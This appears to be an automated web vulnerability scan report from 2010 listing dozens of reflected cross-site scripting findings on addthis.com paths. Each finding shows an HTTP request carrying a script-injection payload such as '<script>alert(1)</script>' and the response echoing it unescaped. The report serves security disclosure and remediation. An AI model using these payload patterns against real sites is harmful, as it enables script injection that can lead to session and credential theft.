Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/6c07c"-alert(1)-"345ff452a56 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 16:56:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/6c07c"-alert(1)-"345ff452a56"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c82d9<script>alert(1)</script>fdcbc7a51dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3af4b"-alert(1)-"778de5bfb4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:10:15 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 1593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT3af4b"-alert(1)-"778de5bfb4b"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.94. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 52985<script>alert(1)</script>c2109c4da0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cfd7<script>alert(1)</script>e725d8a4db7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 278d6"-alert(1)-"ce0f54c8f21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a74f<script>alert(1)</script>b715ff394f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /labs2a74f<script>alert(1)</script>b715ff394f5/sharebar HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:07 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=r1uiniigtcm2o9665dceg3l7a1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1475 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>labs2a74f<script>alert(1)</script>b715ff394f5/sharebar</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e40"-alert(1)-"f69a97632a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /labs98e40"-alert(1)-"f69a97632a6/sharebar HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:06 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=s25hh7o8aj9hivfipoa2r9g376; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1449 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/labs98e40"-alert(1)-"f69a97632a6/sharebar"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 22a81<script>alert(1)</script>017d8df923a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /labs/sharebar22a81<script>alert(1)</script>017d8df923a HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:11 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=9505qf7soqfl8tp9tjhbvrnva0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1475 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>labs/sharebar22a81<script>alert(1)</script>017d8df923a</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea60"-alert(1)-"fb95837da68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /labs/sharebarbea60"-alert(1)-"fb95837da68 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=t0jjtrn86ervt30up9qccjvna3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1449 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/labs/sharebarbea60"-alert(1)-"fb95837da68"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48c30<script>alert(1)</script>97c119f9d4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /labs48c30<script>alert(1)</script>97c119f9d4c/sharebar/ HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:06 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=gumktcoa631jau9eq58bo3a6n4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1477 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>labs48c30<script>alert(1)</script>97c119f9d4c/sharebar/</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c93"-alert(1)-"015370cd7b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /labsc3c93"-alert(1)-"015370cd7b1/sharebar/ HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:06 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=4vvuq8gvavofrrm6aajh0vbc10; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1451 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/labsc3c93"-alert(1)-"015370cd7b1/sharebar/"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b79e<script>alert(1)</script>6e72fe07aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /labs/sharebar2b79e<script>alert(1)</script>6e72fe07aab/ HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=4o1js9c6qoqlapr84rrevdmjm7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1477 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>labs/sharebar2b79e<script>alert(1)</script>6e72fe07aab/</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab65"-alert(1)-"a907e3ac5d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /labs/sharebar8ab65"-alert(1)-"a907e3ac5d9/ HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:07 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=0mcpu733knmj17rqsvpush0ek3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1451 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/labs/sharebar8ab65"-alert(1)-"a907e3ac5d9/"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._ge ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b687"-alert(1)-"5544c0af5fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services6b687"-alert(1)-"5544c0af5fb/submit HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:06 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=ro0pprbgg02gv0ps8843aufqj2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1453 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services6b687"-alert(1)-"5544c0af5fb/submit"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _g ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d48f3<script>alert(1)</script>7fec965f9fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servicesd48f3<script>alert(1)</script>7fec965f9fb/submit HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:06 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=u4ab98dm5nk5ev3e48a1bl69a7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1479 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>servicesd48f3<script>alert(1)</script>7fec965f9fb/submit</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f28ad"-alert(1)-"9b939b22c7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/submitf28ad"-alert(1)-"9b939b22c7d HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:07 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=epv9ku1jg9s8m3t3j94jsm1c34; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1453 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services/submitf28ad"-alert(1)-"9b939b22c7d"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57fdb<script>alert(1)</script>57c7a554130 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/submit57fdb<script>alert(1)</script>57c7a554130 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=r6d67jvi441r6bg5srbf399u47; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1479 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services/submit57fdb<script>alert(1)</script>57c7a554130</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12552"-alert(1)-"62b69e85072 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ab00<script>alert(1)</script>7d42c08a525 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75a7b"-alert(1)-"0a892740684 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49a57<script>alert(1)</script>3b229a5bc8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 41da8<script>alert(1)</script>0930d1726d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2d73"-alert(1)-"69586b36faf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:13:32 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 1561
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POCc2d73"-alert(1)-"69586b36faf"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.115. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a2749<script>alert(1)</script>6a4b41f81b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0b50<script>alert(1)</script>e93df9b1aef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad7de"-alert(1)-"5df2828d99b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5766f"-alert(1)-"ba98fa08a3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78312<script>alert(1)</script>0b016d8c0e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fc54"-alert(1)-"82596acea0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e9c29<script>alert(1)</script>f5118c59dad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 17:13:27 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 1659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMTe9c29<script>alert(1)</script>f5118c59dad</strong> ...[SNIP]...
2.122. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ea55f<script>alert(1)</script>15dfb687cb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ddd0"-alert(1)-"6d181bcf17d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
